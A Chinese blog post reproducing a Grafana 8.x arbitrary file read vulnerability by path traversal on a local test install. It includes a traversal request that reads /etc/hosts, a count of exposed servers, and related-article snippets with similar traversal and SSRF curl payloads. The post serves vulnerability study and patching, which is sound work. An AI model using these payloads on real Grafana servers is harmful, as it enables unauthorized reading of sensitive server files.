Grafana 0day漏洞在野利用记录

最新推荐文章于 2024-03-25 01:25:16 发布
最新推荐文章于 2024-03-25 01:25:16 发布
阅读量3.8k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/isxiaole/article/details/121830789
版权

1. 漏洞概述

在这里插入图片描述

Grafana 是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。需要注意的是该漏洞并不依赖于某个特定的插件,而是因为 Grafana在解析插件路由的时候没有对输入进行有效过滤造成的任意文件读取。

2. 漏洞影响

Grafana是否受影响
8.x

3. 漏洞复现

本地搭建Grafana v8.2.6环境(搭建流程此处不再阐述),搭建后访问如下:

在这里插入图片描述
访问http://127.0.0.1:3001/login抓包,更改原始请求


> exp:/public/plugins/welcome/../../../../../../../../../etc/hosts

成功读取hosts文件,如下在这里插入图片描述

3. 影响统计

fofa搜索国内使用Grafana总数,近3w+

在这里插入图片描述

4、整改建议

**非必要禁止对外开放该服务。**
. after
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798
qq_51577576的博客
09-02 1819
[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana存在任意文件读取漏洞未授权的攻击者利用漏洞,能够获取服务器敏感文件。...
grafana最新版使用手册
09-27
详细讲解Grafana从安装到调试整个过程,并通过完整的示例,带你一步一步实现grafana配置
Grafana CVE-2020-13379 SSRF漏洞
weixin_42877383的博客
11-25 1660
poc curl -I http://{url}//avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D 效果截图 不存在漏洞 如果使用自签名证书 curl报错,可添加-k参数
Grafana
最新发布
2302_80472909的博客
03-25 107
刚开始一直在这个界面里面想要找些上面有用的信息,又偏偏在里面发现了这么个东西,我就一直以为flag在这里面,捣鼓这捣鼓那的,想着是不是哪里有可以写代码命令执行啥的,就完全没去百度,谷歌搜索一下,然后就一直卡在这里了。直接用bp抓包,读取文件 /tmp/flag ,可以得到flag。刚开始有个登录页面,需要爆破用户名和密码(也可以直接猜出来)admin 和 123456。因为题目有提示falg在 /tmp/flag 里。赛后wp说有个任意文件读取漏洞
0day漏洞利用分析
08-09
此书涉及了大量的底层知识,能让读者更深入的了解计算机,了解漏洞的机制,其中也囊括一些经典的黑客技术
逃逸IE浏览器沙箱-在野0Day漏洞利用复现
10-13
逃逸IE浏览器沙箱_在野0Day漏洞利用复现
Grafana 未授权任意文件读取漏洞
weixin_51387754的博客
12-07 899
漏洞简介 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。 经测试,目前最新版本(Grafana v8.2.6)仍存在漏洞漏洞复现 app=“Grafana” 抓包 GET /public/plugins/graph/../../../../../../../../../../../../../../..
渗透测试】Grafana_8.x 任意文件读取批量检测
SunnyCat
12-08 570
渗透测试】Grafana_8.x 任意文件读取批量检测 用法: grafana_publics.txt 中放置对应的模块 “grafana” ip+port.txt 中放置需要检查的ip,默认端口80,修改端口需要添加在后面 “127.0.0.1:3000” python3 grafana_check_ip+port.py Grafana_8.x_vuln_out.txt 保存输出结果 # -*- encoding: utf-8 -*- # Time : 2021/12/07 23:05:31 # gra
grafana 目录遍历(CVE-2021-43798)漏洞复现【VULFOCUS靶场-中级】--拿flag的历程
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
05-26 9498
漏洞名称: grafana 目录遍历 (CVE-2021-43798) 漏洞描述: Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7...
Grafana 未经授权任意访问漏洞(CVE-2022-32275)
murphysec的博客
06-08 8630
CVE-2022-32275漏洞是由于Grafana存在未授权访问漏洞,攻击者可以通过特定url,访问任意用户系统界面及读取任意文件。该漏洞影响范围一般。该问题已在新版本中修复,建议用户更新到最新版本。参考链接:https://nvd.nist.gov/vuln/detail/CVE-2022-32275 MISC:https://github.com/BrotherOfJhonny/grafana/blob/main/README.md       【使用墨菲安全的开源工具帮您快速检测代码安全】 墨菲安全
prometheus+grafana漏洞汇总
qq_44657899的博客
02-23 1万+
文章目录基本介绍grafanaprometheus 基本介绍 prometheus+grafana一般合起来用,作用是监控 以下介绍部分参考:prometheus+grafana监控设置 Prometheus(普罗米修斯)是一套开源的监控&报警&时间序列数据库的组合,起始是由SoundCloud公司开发的。随着发展,越来越多公司和组织接受采用Prometheus,社会也十分活跃,他们便将它独立成开源项目,并且有公司来运作。Google SRE的书内也曾提到跟他们BorgMon监控系统相似的实
揭秘家用路由器0day漏洞挖掘技术
08-14
全球第一本关于家用路由器底层安全分析的书籍!系统剖析路由器硬件分析之道。技术要点与实践可延伸到智能物联、工控系统等新兴领域!吴石、余弦推荐!
最新IE 0day漏洞Metasploit生成方法.txt
03-18
最新IE 0day漏洞Metasploit生成方法.txt
Grafana 任意文件读取漏洞复现分析
weixin_45794666的博客
03-02 2810
Grafana 任意文件读取漏洞复现分析 CVE-2021-43798 0x01 前言 概述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 影响范围 Grafana 8.0.0-beta1 - 8.3.0 安全版本 Grafana >= 8.3.1 Grafana >= 8.2.7 Grafana >= 8.1.8 Grafana >= 8.0.7 0x02 环境搭建 do
Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用
smellycat000的专栏
12-08 1435
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798)...
shell脚本安装Grafana 8.0.3
出发之前永远是梦想,上路之后永远是挑战。
06-29 553
脚本说明: RedHat系列操作系统 系统登录用户teld,根据实际情况可做替换 rpm统一存放位置/usr/local/rpm grafana相关存储位置在/mnt/data/grafana grafana.sh #!/bin/bash if [ ! -d /usr/local/rpm ]; then sudo mkdir -p /usr/local/rpm sudo chown -R teld:teld /usr/local/rpm echo "<<<<<&l
Grafana任意文件读取漏洞(CVE-2021-43798)
热门推荐
chaojixiaojingang
03-14 2万+
1.漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。未授权的攻击者利用漏洞,能够获取服务器敏感文件。 2.影响版本 Grafana 8.0.0 - 8.3.0 3.漏洞环境搭建 更新vulhub目录,进入vulhub/grafana/CVE-2021-43798 docker-compose up –d #下载安装漏洞镜像 访问目标3000端口 4.漏洞复现 访问...
Grafana 提醒注意严重的认证绕过漏洞
smellycat000的专栏
06-25 934
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Grafana 为其多个应用版本发布安全修复方案,修复了一个严重漏洞,它可使攻击者绕过认证并接管使用 Azure Active Directory 用于认证的任何 Grafana 账户。该漏洞的编号是CVE-2023-3128,CVSS v3.1评分是9.4。Grafana 是一款广泛使用的开源分析和交互可视化 app,通过大量监控平台和应用程序...
揭秘家用路由器0day漏洞挖掘技术 pdf
06-21
### 回答1: 《揭秘家用路由器0day漏洞挖掘技术》是一本讲解家用路由器漏洞挖掘的技术书籍。这本书主要讲述了路由器漏洞的挖掘原理、方法和步骤,以及如何利用漏洞获取系统的管理员权限。 书中首先介绍了家用路由器的基本原理和工作模式,以及路由器的基本安全机制,包括密码验证、防火墙等,再讲述了路由器漏洞的基础知识,如堆栈溢出、格式化字符串漏洞等,为读者打下了扎实的理论基础。 接着,书中详细讲解了路由器漏洞的挖掘方法和技巧,包括静态分析、动态分析和Fuzzing技术,其中尤其强调了Fuzzing技术的重要性。Fuzzing技术是一种自动化的漏洞测试方法,通过向系统输入大量随机的无效数据,来寻找系统的漏洞,是现代漏洞挖掘技术中不可缺少的一部分。 最后,书中还分享了一些实用的漏洞利用技巧,如ROP链、GOT覆盖等,帮助读者能够深入理解漏洞利用的原理和方法,更好地应对各种复杂情况。 总的来说,《揭秘家用路由器0day漏洞挖掘技术》是一本非常实用的技术书籍,对于研究家用路由器安全的人员来说是一本不错的参考书。同时,对于网络安全爱好者,这本书也有很好的启发和帮助作用。 ### 回答2: 《揭秘家用路由器0day漏洞挖掘技术》是一份技术文档,主要介绍了基于路由器的0day漏洞挖掘技术和攻击方法。首先,文档介绍了路由器的基本结构和工作原理,包括路由器的硬件和软件组成,以及路由器的主要功能。其次,文档讲解了如何使用路由器的操作系统和开源工具进行漏洞分析和挖掘。最后,文档介绍了一些实际案例,包括路由器上的重大漏洞和针对路由器的攻击手段。 在文档中,作者重点介绍了路由器中常见的漏洞类型,包括缓冲区溢出、格式化字符串漏洞等,以及漏洞挖掘的一般方法。特别是在讲解缓冲区溢出漏洞时,作者详细地介绍了漏洞的原理、危害和检测方法,为有志于从事漏洞挖掘工作的安全研究员提供了有益的指导和参考。 除了讲解漏洞挖掘技术,文档还介绍了路由器中常见的攻击手段,如ARP欺骗、DNS劫持、端口扫描和DDoS攻击等。同时,文档也指出了如何通过安全配置和固件升级等方法来提高路由器的安全性。 总之,这份文档从技术方面全面详细地介绍了家用路由器的漏洞和攻击,为安全研究工作者提供了更深入的认识和了解,也提醒用户关注家用路由器的安全性。需要指出的是,本文档旨在为安全研究和教育提供帮助,对非法攻击行为不作任何支持或鼓励。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值